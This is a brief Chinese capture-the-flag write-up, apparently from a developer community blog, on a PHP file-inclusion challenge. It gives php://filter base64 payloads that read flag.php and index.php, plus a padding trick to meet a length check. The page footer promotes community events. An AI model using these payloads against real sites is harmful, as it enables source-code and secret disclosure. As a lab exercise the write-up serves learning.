php伪协议

flag=php://filter/read=convert.base64-encode/resource=flag.php

 

有waf,尝试着查看index.php可以正常返回加密的base64,解码后得源码

 简单分析,需要满足传入有flag并且传入的字符数要>800才会满足包含条件

 payload:

0=0*1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&flag=php://filter/read=convert.base64-encode/resource=index.php

 得到后解码

 

# php
Logo
深圳城市开发者社区

一座年轻的奋斗人之城,一个温馨的开发者之家。在这里,代码改变人生,开发创造未来!

更多推荐

cover

职场AI提效●深圳 CMeet系列 技术生态沙龙,跟着大佬一起职场升(职)省(心)生(财)!

avatar 深圳城市开发者社区
cover

亚马逊云科技User Group,深圳 Community Day 活动流程抢先知道!

avatar 深圳城市开发者社区
cover

深圳COC社区邀你一起奔赴 【PowerData 2024 数字经济●深圳开源行】开源技术活动

avatar 深圳城市开发者社区